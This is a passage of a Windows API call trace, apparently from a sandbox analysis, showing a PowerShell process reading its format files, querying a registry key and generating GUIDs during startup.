	[0769.458] ReadFile (in: hFile=0x310, lpBuffer=0x2d016a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2d016a8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0769.459] ReadFile (in: hFile=0x310, lpBuffer=0x2d016a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2d016a8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0769.459] ReadFile (in: hFile=0x310, lpBuffer=0x2d016a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2d016a8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0769.459] ReadFile (in: hFile=0x310, lpBuffer=0x2d016a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2d016a8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0769.460] ReadFile (in: hFile=0x310, lpBuffer=0x2d016a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2d016a8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0769.460] ReadFile (in: hFile=0x310, lpBuffer=0x2d016a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2d016a8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0769.460] ReadFile (in: hFile=0x310, lpBuffer=0x2d016a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2d016a8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0769.461] ReadFile (in: hFile=0x310, lpBuffer=0x2d016a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2d016a8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0769.461] ReadFile (in: hFile=0x310, lpBuffer=0x2d016a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2d016a8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0769.461] ReadFile (in: hFile=0x310, lpBuffer=0x2d016a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2d016a8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0769.467] ReadFile (in: hFile=0x310, lpBuffer=0x2d016a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2d016a8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0769.468] ReadFile (in: hFile=0x310, lpBuffer=0x2d016a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2d016a8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0769.468] ReadFile (in: hFile=0x310, lpBuffer=0x2d016a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2d016a8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0769.468] ReadFile (in: hFile=0x310, lpBuffer=0x2d016a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2d016a8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0769.469] ReadFile (in: hFile=0x310, lpBuffer=0x2d016a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2d016a8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0769.469] ReadFile (in: hFile=0x310, lpBuffer=0x2d016a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2d016a8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0769.469] ReadFile (in: hFile=0x310, lpBuffer=0x2d016a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2d016a8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0769.470] ReadFile (in: hFile=0x310, lpBuffer=0x2d016a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2d016a8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0769.470] ReadFile (in: hFile=0x310, lpBuffer=0x2d016a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2d016a8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0769.470] ReadFile (in: hFile=0x310, lpBuffer=0x2d016a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2d016a8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0769.471] ReadFile (in: hFile=0x310, lpBuffer=0x2d016a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2d016a8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0769.471] ReadFile (in: hFile=0x310, lpBuffer=0x2d016a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2d016a8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0769.471] ReadFile (in: hFile=0x310, lpBuffer=0x2d016a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2d016a8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0769.472] ReadFile (in: hFile=0x310, lpBuffer=0x2d016a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2d016a8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0769.472] ReadFile (in: hFile=0x310, lpBuffer=0x2d016a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2d016a8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0769.472] ReadFile (in: hFile=0x310, lpBuffer=0x2d016a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2d016a8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0769.473] ReadFile (in: hFile=0x310, lpBuffer=0x2d016a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2d016a8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0769.473] ReadFile (in: hFile=0x310, lpBuffer=0x2d016a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2d016a8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0769.474] ReadFile (in: hFile=0x310, lpBuffer=0x2d016a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2d016a8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0769.474] ReadFile (in: hFile=0x310, lpBuffer=0x2d016a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2d016a8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0769.474] ReadFile (in: hFile=0x310, lpBuffer=0x2d016a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2d016a8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0769.475] ReadFile (in: hFile=0x310, lpBuffer=0x2d016a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2d016a8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0769.475] ReadFile (in: hFile=0x310, lpBuffer=0x2d016a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2d016a8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0769.475] ReadFile (in: hFile=0x310, lpBuffer=0x2d016a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2d016a8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0769.476] ReadFile (in: hFile=0x310, lpBuffer=0x2d016a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2d016a8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0769.476] ReadFile (in: hFile=0x310, lpBuffer=0x2d016a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2d016a8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0769.476] ReadFile (in: hFile=0x310, lpBuffer=0x2d016a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2d016a8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0769.477] ReadFile (in: hFile=0x310, lpBuffer=0x2d016a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2d016a8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0769.477] ReadFile (in: hFile=0x310, lpBuffer=0x2d016a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2d016a8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0769.477] ReadFile (in: hFile=0x310, lpBuffer=0x2d016a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2d016a8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0769.477] ReadFile (in: hFile=0x310, lpBuffer=0x2d016a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2d016a8*, lpNumberOfBytesRead=0x1ecd98*=0xf37, lpOverlapped=0x0) returned 1
	[0770.161] ReadFile (in: hFile=0x310, lpBuffer=0x2d00d47, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2d00d47*, lpNumberOfBytesRead=0x1ecd98*=0x0, lpOverlapped=0x0) returned 1
	[0770.161] ReadFile (in: hFile=0x310, lpBuffer=0x2d016a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2d016a8*, lpNumberOfBytesRead=0x1ecd98*=0x0, lpOverlapped=0x0) returned 1
	[0770.161] CloseHandle (hObject=0x310) returned 1
	[0770.161] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0770.161] SetErrorMode (uMode=0x1) returned 0x1
	[0770.162] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ecd40 | out: lpFileInformation=0x1ecd40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0770.162] SetErrorMode (uMode=0x1) returned 0x1
	[0770.162] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1eca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0770.162] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ece28 | out: phkResult=0x1ece28*=0x310) returned 0x0
	[0770.162] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ecdac, lpData=0x0, lpcbData=0x1ecda8*=0x0 | out: lpType=0x1ecdac*=0x1, lpData=0x0, lpcbData=0x1ecda8*=0x56) returned 0x0
	[0770.162] CoTaskMemAlloc (cb=0x5a) returned 0x1b3da220
	[0770.162] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ecd7c, lpData=0x1b3da220, lpcbData=0x1ecd78*=0x56 | out: lpType=0x1ecd7c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ecd78*=0x56) returned 0x0
	[0770.162] CoTaskMemFree (pv=0x1b3da220) 
	[0770.162] RegCloseKey (hKey=0x310) returned 0x0
	[0770.162] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1eca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0770.162] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ec920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0770.167] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xf9d564b6, Data2=0x7148, Data3=0x47f2, Data4=([0]=0xb7, [1]=0x37, [2]=0x21, [3]=0x44, [4]=0x73, [5]=0xf9, [6]=0x3a, [7]=0xd))) returned 0x0
	[0770.168] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xbcaf6dd4, Data2=0x2e55, Data3=0x4ce5, Data4=([0]=0x84, [1]=0x7, [2]=0xde, [3]=0x9, [4]=0xf5, [5]=0x37, [6]=0xe7, [7]=0x8a))) returned 0x0
	[0770.183] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x8f88cff3, Data2=0x120f, Data3=0x4490, Data4=([0]=0xb2, [1]=0x74, [2]=0xdf, [3]=0xdc, [4]=0x6a, [5]=0xe5, [6]=0xf4, [7]=0x62))) returned 0x0
	[0770.184] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x580e5959, Data2=0xf90b, Data3=0x4ad9, Data4=([0]=0xa4, [1]=0xe9, [2]=0x3b, [3]=0xc7, [4]=0x58, [5]=0xdc, [6]=0xc6, [7]=0x1d))) returned 0x0
	[0770.186] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xe0f5e532, Data2=0x1dee, Data3=0x4ec6, Data4=([0]=0x8b, [1]=0x5f, [2]=0xd9, [3]=0x73, [4]=0xa2, [5]=0x13, [6]=0xd6, [7]=0xdd))) returned 0x0
	[0770.186] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xcd1ba2e0, Data2=0x865d, Data3=0x4158, Data4=([0]=0x91, [1]=0x4f, [2]=0xc6, [3]=0xdc, [4]=0x45, [5]=0x8c, [6]=0xe4, [7]=0xb1))) returned 0x0
	[0770.188] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xfcdea1d8, Data2=0x1040, Data3=0x4520, Data4=([0]=0xa3, [1]=0xf1, [2]=0x57, [3]=0xde, [4]=0xb5, [5]=0x74, [6]=0x40, [7]=0xd5))) returned 0x0
	[0770.189] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x717d6cba, Data2=0x9d8b, Data3=0x461f, Data4=([0]=0xb3, [1]=0x6, [2]=0xa2, [3]=0x64, [4]=0x3e, [5]=0x40, [6]=0x79, [7]=0x3f))) returned 0x0
	[0770.189] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xb468738b, Data2=0x6ecc, Data3=0x4262, Data4=([0]=0x9b, [1]=0xb1, [2]=0xfb, [3]=0xd9, [4]=0x0, [5]=0x87, [6]=0x69, [7]=0xcd))) returned 0x0
	[0770.190] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x88ab01a1, Data2=0x924c, Data3=0x4379, Data4=([0]=0x8d, [1]=0x19, [2]=0xc9, [3]=0x29, [4]=0x6e, [5]=0x5e, [6]=0xec, [7]=0xf4))) returned 0x0
	[0770.190] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xd91a48c6, Data2=0x113c, Data3=0x48fc, Data4=([0]=0xb8, [1]=0x46, [2]=0xab, [3]=0x59, [4]=0xcd, [5]=0xaf, [6]=0xb2, [7]=0xac))) returned 0x0
	[0770.190] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xa959d2e6, Data2=0xb9ba, Data3=0x4136, Data4=([0]=0x9c, [1]=0x7, [2]=0x3c, [3]=0xfe, [4]=0x5c, [5]=0x1f, [6]=0x36, [7]=0x7b))) returned 0x0
	[0770.190] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xbf899837, Data2=0x4714, Data3=0x45c8, Data4=([0]=0xa7, [1]=0x21, [2]=0x5b, [3]=0xb4, [4]=0x2c, [5]=0xc1, [6]=0xe7, [7]=0x33))) returned 0x0
	[0770.190] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xf00e890e, Data2=0x86da, Data3=0x45d8, Data4=([0]=0xb8, [1]=0x13, [2]=0xf3, [3]=0xbe, [4]=0xfb, [5]=0x9, [6]=0x68, [7]=0x97))) returned 0x0
	[0770.190] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x167d3217, Data2=0xfe4, Data3=0x40cb, Data4=([0]=0xbf, [1]=0x35, [2]=0x95, [3]=0x29, [4]=0x55, [5]=0xb7, [6]=0x99, [7]=0xd7))) returned 0x0
	[0770.192] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xc402fc34, Data2=0xe09e, Data3=0x4fe2, Data4=([0]=0x8f, [1]=0x61, [2]=0xbd, [3]=0xc2, [4]=0xf0, [5]=0xaf, [6]=0x48, [7]=0x60))) returned 0x0
	[0770.193] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x3cb9b917, Data2=0xff55, Data3=0x4030, Data4=([0]=0x8b, [1]=0xc7, [2]=0x4d, [3]=0xa8, [4]=0xc3, [5]=0x81, [6]=0x18, [7]=0xd1))) returned 0x0
	[0770.193] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xa86fb1dd, Data2=0x9f9a, Data3=0x4518, Data4=([0]=0xbd, [1]=0x42, [2]=0x2e, [3]=0x51, [4]=0xe1, [5]=0x99, [6]=0xf6, [7]=0x73))) returned 0x0
	[0770.194] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x2f3df58f, Data2=0x4ffb, Data3=0x4312, Data4=([0]=0xb2, [1]=0x10, [2]=0x1f, [3]=0xd5, [4]=0x29, [5]=0xf6, [6]=0xca, [7]=0xc7))) returned 0x0
	[0770.194] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xf67c3027, Data2=0xbfbb, Data3=0x4510, Data4=([0]=0xbb, [1]=0x2e, [2]=0x64, [3]=0xf8, [4]=0xc2, [5]=0x78, [6]=0x72, [7]=0xc5))) returned 0x0
	[0770.194] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x3eadd9d8, Data2=0xbbe0, Data3=0x431e, Data4=([0]=0xa4, [1]=0xb3, [2]=0xb8, [3]=0x58, [4]=0xe5, [5]=0x61, [6]=0xb9, [7]=0x70))) returned 0x0
	[0770.194] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x433c69d3, Data2=0x3b78, Data3=0x48fb, Data4=([0]=0x90, [1]=0x8e, [2]=0xce, [3]=0x6a, [4]=0x19, [5]=0x47, [6]=0x87, [7]=0x1))) returned 0x0
	[0770.194] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xa21fb495, Data2=0xcf6c, Data3=0x4ebb, Data4=([0]=0x99, [1]=0xe1, [2]=0x28, [3]=0x77, [4]=0xa, [5]=0x9d, [6]=0x17, [7]=0xd5))) returned 0x0
	[0770.195] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xd61337fc, Data2=0x2b39, Data3=0x4926, Data4=([0]=0x80, [1]=0x54, [2]=0xd3, [3]=0xe0, [4]=0x50, [5]=0xbc, [6]=0xc8, [7]=0xc7))) returned 0x0
	[0770.195] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x3f32722a, Data2=0x1907, Data3=0x4296, Data4=([0]=0x86, [1]=0x4f, [2]=0xe, [3]=0xd7, [4]=0xfd, [5]=0xd0, [6]=0x1e, [7]=0xc4))) returned 0x0
	[0770.195] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x310
	[0770.195] GetFileType (hFile=0x310) returned 0x1
	[0770.195] SetErrorMode (uMode=0x1) returned 0x1
	[0770.195] GetFileType (hFile=0x310) returned 0x1
	[0770.195] ReadFile (in: hFile=0x310, lpBuffer=0x31590a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x31590a8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0770.196] ReadFile (in: hFile=0x310, lpBuffer=0x31590a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x31590a8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0770.196] ReadFile (in: hFile=0x310, lpBuffer=0x31590a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x31590a8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0770.740] ReadFile (in: hFile=0x310, lpBuffer=0x31590a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x31590a8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0770.740] ReadFile (in: hFile=0x310, lpBuffer=0x31590a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x31590a8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0770.740] ReadFile (in: hFile=0x310, lpBuffer=0x31590a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x31590a8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0770.740] ReadFile (in: hFile=0x310, lpBuffer=0x31590a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x31590a8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0770.740] ReadFile (in: hFile=0x310, lpBuffer=0x31590a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x31590a8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0770.741] ReadFile (in: hFile=0x310, lpBuffer=0x31590a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x31590a8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0770.742] ReadFile (in: hFile=0x310, lpBuffer=0x31590a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x31590a8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0770.750] ReadFile (in: hFile=0x310, lpBuffer=0x31590a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x31590a8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0770.751] ReadFile (in: hFile=0x310, lpBuffer=0x31590a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x31590a8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0770.751] ReadFile (in: hFile=0x310, lpBuffer=0x31590a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x31590a8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0770.751] ReadFile (in: hFile=0x310, lpBuffer=0x31590a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x31590a8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0770.752] ReadFile (in: hFile=0x310, lpBuffer=0x31590a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x31590a8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0770.752] ReadFile (in: hFile=0x310, lpBuffer=0x31590a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x31590a8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0770.752] ReadFile (in: hFile=0x310, lpBuffer=0x31590a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x31590a8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
